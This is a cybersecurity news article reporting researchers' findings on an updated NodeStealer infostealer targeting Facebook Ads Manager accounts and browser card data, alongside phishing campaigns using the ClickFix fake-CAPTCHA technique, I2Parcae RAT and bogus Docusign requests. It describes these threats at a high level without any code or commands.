Threat hunters are warning about an updated version of the Python-based NodeStealer that's now equipped to extract more information from victims' Facebook Ads Manager accounts and harvest credit card data stored in web browsers.
"They collect budget details of Facebook Ads Manager accounts of their victims, which might be a gateway for Facebook malvertisement," Netskope Threat Labs researcher Jan Michael Alcantara said in a report shared with The Hacker News.
"New techniques used by NodeStealer include using Windows Restart Manager to unlock browser database files, adding junk code, and using a batch script to dynamically generate and execute the Python script."
NodeStealer, first publicly documented by Meta in May 2023, started off as JavaScript malware before evolving into a Python stealer capable of gathering data related to Facebook accounts in order to facilitate their takeover.
It's assessed to be developed by Vietnamese threat actors, who have a history of leveraging various malware families that are centered around hijacking Facebook advertising and business accounts to fuel other malicious activities.
The latest analysis from Netskopke shows that NodeStealer artifacts have begun to target Facebook Ads Manager accounts that are used to manage ad campaigns across Facebook and Instagram, in addition to striking Facebook Business accounts.
In doing so, it's suspected that the intention of the attackers is not just to take control of Facebook accounts, but to also weaponize them for use in malvertising campaigns that further propagate the malware under the guise of popular software or games.
"We recently found several Python NodeStealer samples that collect budget details of the account using Facebook Graph API," Michael Alcantara explained. "The samples initially generate an access token by logging into adsmanager.facebook[.]com using cookies collected on the victim's machine."
Aside from collecting the tokens and business-related information tied to those accounts, the malware includes a check that's explicitly designed to avoid infecting machines located in Vietnam as a way to evade law enforcement actions, further solidifying its origins.
On top of that, certain NodeStealer samples have been found to use the legitimate Windows Restart Manager to unlock SQLite database files that are possibly being used by other processes. This is done so in an attempt to siphon credit card data from various web browsers.
Data exfiltration is achieved using Telegram, underscoring that the messaging platform still continues to be a crucial vector for cybercriminals despite recent changes to its policy.
Malvertising via Facebook is a lucrative infection pathway, often impersonating trusted brands to disseminate all kinds of malware. This is evidenced by the emergence of a new campaign starting November 3, 2024, that has mimicked the Bitwarden password manager software through Facebook sponsored ads to install a rogue Google Chrome extension.
"The malware gathers personal data and targets Facebook business accounts, potentially leading to financial losses for individuals and businesses," Bitdefender said in a report published Monday. "Once again, this campaign highlights how threat actors exploit trusted platforms like Facebook to lure users into compromising their own security."
Phishing Emails Distribute I2Parcae RAT via ClickFix Technique
The development comes as Cofense has alerted to new phishing campaigns that employ website contact forms and invoice-themed lures to deliver malware families like I2Parcae RAT and PythonRatLoader, respectively, with the latter acting as a conduit to deploy AsyncRAT, DCRat, and Venom RAT.
I2Parcae is "notable for having several unique tactics, techniques, and procedures (TTPs), such as Secure Email Gateway (SEG) evasion by proxying emails through legitimate infrastructure, fake CAPTCHAs, abusing hardcoded Windows functionality to hide dropped files, and C2 capabilities over Invisible Internet Project (I2P), a peer-to-peer anonymous network with end-to-end encryption," Cofense researcher Kahng An said.
"When infected, I2Parcae is capable of disabling Windows Defender, enumerating Windows Security Accounts Manager (SAM) for accounts/groups, stealing browser cookies, and remote access to infected hosts."
Attack chains involve the propagation of booby-trapped pornographic links in email messages that, upon clicking, lead message recipients to an intermediate fake CAPTCHA verification page, which urges victims to copy and execute an encoded PowerShell script in order to access the content, a technique that has been called ClickFix.
ClickFix, in recent months, has become a popular social engineering trick to lure unsuspecting users into downloading malware under the pretext of addressing a purported error or completing a reCAPTCHA verification. It's also effective at sidestepping security controls owing to the fact that users infect themselves by executing the code.
Enterprise security firm Proofpoint said that the ClickFix technique is being used by multiple "unattributed" threat actors to deliver an array of remote access trojans, stealers, and even post-exploitation frameworks such as Brute Ratel C4. It has even been adopted by suspected Russian espionage actors to breach Ukrainian government entities.
"Threat actors have been observed recently using a fake CAPTCHA themed ClickFix technique that pretends to validate the user with a 'Verify You Are Human' (CAPTCHA) check," security researchers Tommy Madjar and Selena Larson said. "Much of the activity is based on an open source toolkit named reCAPTCHA Phish available on GitHub for 'educational purposes.'"
"What's insidious about this technique is the adversaries are preying on people's innate desire to be helpful and independent. By providing what appears to be both a problem and a solution, people feel empowered to 'fix' the issue themselves without needing to alert their IT team or anyone else, and it bypasses security protections by having the person infect themselves."
The disclosures also coincide with a rise in phishing attacks that make use of bogus Docusign requests to bypass detection and ultimately conduct financial fraud.
"These attacks pose a dual threat for contractors and vendors – immediate financial loss and potential business disruption," SlashNext said. "When a fraudulent document is signed, it can trigger unauthorized payments while simultaneously creating confusion about actual licensing status. This uncertainty can lead to delays in bidding on new projects or maintaining current contracts."
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.